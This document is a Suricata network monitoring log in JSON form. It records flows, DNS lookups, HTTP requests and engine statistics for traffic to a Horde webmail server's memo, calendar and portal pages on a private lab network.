{"timestamp":"2020-02-29T00:10:12.000172+0000","flow_id":1278752082539280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1233,"bytes_toclient":7100,"start":"2020-02-29T00:09:06.439056+0000","end":"2020-02-29T00:09:11.765350+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:12.397307+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":20631,"tx_id":2}} {"timestamp":"2020-02-29T00:10:14.000441+0000","flow_id":212195723528106,"event_type":"flow","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:13.280490+0000","end":"2020-02-29T00:05:13.388520+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:16.000681+0000","flow_id":127932775662908,"event_type":"flow","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1233,"bytes_toclient":1174,"start":"2020-02-29T00:09:10.329020+0000","end":"2020-02-29T00:09:15.522203+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:16.614511+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30292,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:16.870668+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981}} {"timestamp":"2020-02-29T00:10:17.000180+0000","event_type":"stats","stats":{"uptime":14269,"capture":{"kernel_packets":134333,"kernel_drops":0},"decoder":{"pkts":134338,"bytes":92755574,"invalid":185,"ipv4":132861,"ipv6":8,"ethernet":134338,"raw":0,"null":0,"sll":0,"tcp":127663,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2719,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":87374,"memcap":0}}} {"timestamp":"2020-02-29T00:10:18.000391+0000","flow_id":2001607963729589,"event_type":"flow","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4177,"start":"2020-02-29T00:09:12.614069+0000","end":"2020-02-29T00:09:17.822939+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:21.748959+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37763,"tx_id":0}} {"timestamp":"2020-02-29T00:10:21.758965+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12570,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.444617+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342}} {"timestamp":"2020-02-29T00:10:22.621298+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:22.629755+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33644,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.824684+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.840079+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.978088+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2192,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:24.000668+0000","event_type":"stats","stats":{"uptime":14276,"capture":{"kernel_packets":134365,"kernel_drops":0},"decoder":{"pkts":134408,"bytes":92797098,"invalid":185,"ipv4":132931,"ipv6":8,"ethernet":134408,"raw":0,"null":0,"sll":0,"tcp":127724,"udp":5007,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2737,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2753,"synack":2744,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1777,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2286,"failed_udp":110},"tx":{"http":4582,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2365}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":80040,"memcap":0}}} {"timestamp":"2020-02-29T00:10:25.000291+0000","flow_id":374562667837138,"event_type":"flow","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:23.472786+0000","end":"2020-02-29T00:05:23.581640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:26.069213+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40996,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:26.234777+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} {"timestamp":"2020-02-29T00:10:28.134129+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34788,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:28.134889+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:10:30.000411+0000","flow_id":893553631413293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:29.640045+0000","end":"2020-02-29T00:05:29.748633+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:31.000321+0000","event_type":"stats","stats":{"uptime":14283,"capture":{"kernel_packets":134418,"kernel_drops":0},"decoder":{"pkts":134436,"bytes":92807270,"invalid":185,"ipv4":132957,"ipv6":8,"ethernet":134436,"raw":0,"null":0,"sll":0,"tcp":127747,"udp":5010,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2738,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2754,"synack":2745,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1779,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2287,"failed_udp":110},"tx":{"http":4583,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2366}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2342,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18847,"memcap_state":0,"memcap_global":0},"http":{"memuse":98031,"memcap":0}}} {"timestamp":"2020-02-29T00:10:31.235722+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:10:32.001842+0000","flow_id":1021062620573906,"event_type":"flow","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.454866+0000","end":"2020-02-29T00:05:30.563509+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002075+0000","flow_id":214948798715515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.841339+0000","end":"2020-02-29T00:05:30.949739+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002142+0000","flow_id":113437246634505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.670217+0000","end":"2020-02-29T00:05:30.778890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:35.072059+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54980,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 